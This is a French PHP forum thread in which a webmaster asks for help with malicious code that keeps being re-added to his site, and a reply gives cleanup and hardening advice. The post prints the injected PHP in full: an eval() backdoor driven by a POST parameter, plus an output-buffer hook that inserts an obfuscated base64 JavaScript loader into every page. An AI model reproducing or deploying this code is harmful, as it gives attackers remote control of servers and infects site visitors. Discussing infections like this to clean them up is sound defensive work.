begin process at 2010 02 10 03:03:27
  Trouver un code source :

dans

Accueil > Forum > 

PHP

> 

Web 2.0

> 

Autre

> 

message d'erreur causé par un code virus ajouter automatiquement!!!

Derniers messages déposésPoser une question dans le forum ou lancer une discussion

message d'erreur causé par un code virus ajouter automatiquement!!!

jeudi 26 mars 2009 à 12:12:24 | message d'erreur causé par un code virus ajouter automatiquement!!!

AssistMR

bonjour,
g trouvé un code de plus sur mes pages qui a été ajouter automatiquement, meme apres la supression du code il ya tjrs le meme message d'erreur car le code revient à  chaque fois,
voila le code ke g trouvé :
<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCmRvY3VtZW50LndyaXRlKHVuZXNjYXBlKCclM0NzaXJXY3J0WWlwZUJGdGlyVyUyMFo1bnM2aXJjdFklM0R0WSUyRiUyRjlaNW40WjVuJTJFZUJGMjQ3aXJXJTJFMiUyRWVCRjFaNW45NVFzNSUyRlo1bmppcldxdWVpcldyeWlyVyUyRWppcldzUXM1JTNFNmklM0MlMkZzaXJXY3J0WWl0WXBRczV0JTNFJykucmVwbGFjZSgvdFl8UXM1fHZWNHxlQkZ8aXJXfDZpfFo1bi9nLCIiKSk7CiAtLT48L3NjcmlwdD4='));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?><?php

mnt j'arrive tjrs pas à trouver la solution é mes sites sont tous bloquer!!!
merci de m'envoyer la solution si vous avez rencontrer le meme probleme.

bon courage!!
jeudi 26 mars 2009 à 19:50:33 | Re : message d'erreur causé par un code virus ajouter automatiquement!!!

Flachy Joe

Vérifie TOUTES tes pages PHP, et tes bases SQL. Bloque l'accès à ton site pendant que tu le fait en mettant en place un htaccess (même pas de page d'explication, renvoi tout le monde vers le néant ou sur ce sujet par exemple) et en ayant changer tous tes mots de passes (FTP, zone admin, etc)

Si tu ne trouve rien de particulier ou que le travail est trop gigantesque, restaure si possible une sauvegarde.

Vérifie les protections des entrées utilisateurs en échappant les caractères spéciaux, (htmlspecialchars et mysql_real_escape_string).

Tu devrait trouver des infos par là :
[ Lien ]

A noter que si tu es sur un serveur mutualisé c'est possible que ça ne vienne pas de ton site !

Flachy Joe
« Il vaut mieux mobiliser son intelligence sur des conneries que mobiliser sa connerie sur des choses intelligentes. »
Les Shadoks

Cette discussion est classée dans : code, tmp, preg, ob, if

Répondre à ce message

Sujets en rapport avec ce message

preg_replace [ par Tomcube ] Est-ce que quelqu'un pourrait me modifier cette ligne pour la faire accepter les retours à la ligne (\n), j'ai trop de mal avec les masques ! $text = Métacaractères... [ par mfaraday ] Salut...Est-ce que quelqu'un pourrait m'expliquer comment utiliser les métacaractères dans un profil de recherche pour la fonction preg_match par exem Rand() avec valeur regex [ par mathieumg ] Bonjour j'essaie de faire un tag [de]chiffre[/de] pour mon forum qui fera un chiffre au hasard entre 1 et le chiffre entre les tags, seulement le rand preg_replace pour chaine de code php [ par JoJo738 ] Aide pour un Preg_replace [ par audayls ] Bonjour,    Je souhaite "colorier" un contenu particulié dans une balise, mais jusqu'ici mais mes tentatives ont été nulles ... lol    J'essaye de fai Membre en ligne [ par dclick07 ] Voici mon probleme. Je sais que dans le profil d'un membre ce code ci-dessous me permet de voir si un membre est en ligne mais lorsque j'utilise ce c optimisation petit code de rien du tout [ par jphilippev ] bonjour tt le mondeca faisait longtemps que je n'avais pas posé mes petites questions...la c'est juste pour optimiser mon code donc voilaje fait cela Question templates [ par astuces_jeux ] Bonjour,J'ai remarqué que l'utilisation de la class fasttemplate est compliquée. Alors je voulais savoir si on ne pouvait pas faire ça simple : foncti Masque pour preg_match() ... Aidez-moi ! [ par LocalStone ] Alors, j'expose le problème : J'ai 1 fichier texte qui contient des ligne du style : 0004 - Chu Chu Rocket (J)Donc le masque approprié pour sépare if qui ne fonctionne pas correctement [ par winnie39 ] Bonjour à tous,Voila je dois créer un site pour un stage, mais j' ai un problème de condition.Voila la page se compose d' une image et d' un texte, ma

Nos sponsors

Sondage...

Comparez les prix

CalendriCode

Février 2010
LMMJVSD
1234567
891011121314
15161718192021
22232425262728

Consulter la suite du CalendriCode

Développement réalisé par Nicolas SOREL (Nix) avec l'aide de : Cyril DURAND et Emmanuel (EBArtSoft), Merci à Vincent pour ses précieux conseils.
CodeS-SourceS.com© Toute reproduction même partielle est interdite sauf accord écrit du Webmaster
CodeS-SourceS.com© est une marque déposée tous droits réservés

Google Coop CodeS-SourceS Google Coop CodeS-SourceS
Temps d'éxécution de la page : 27,987 sec (3)

Nous contacter | Annoncer sur CodeS-SourceS | Mentions légales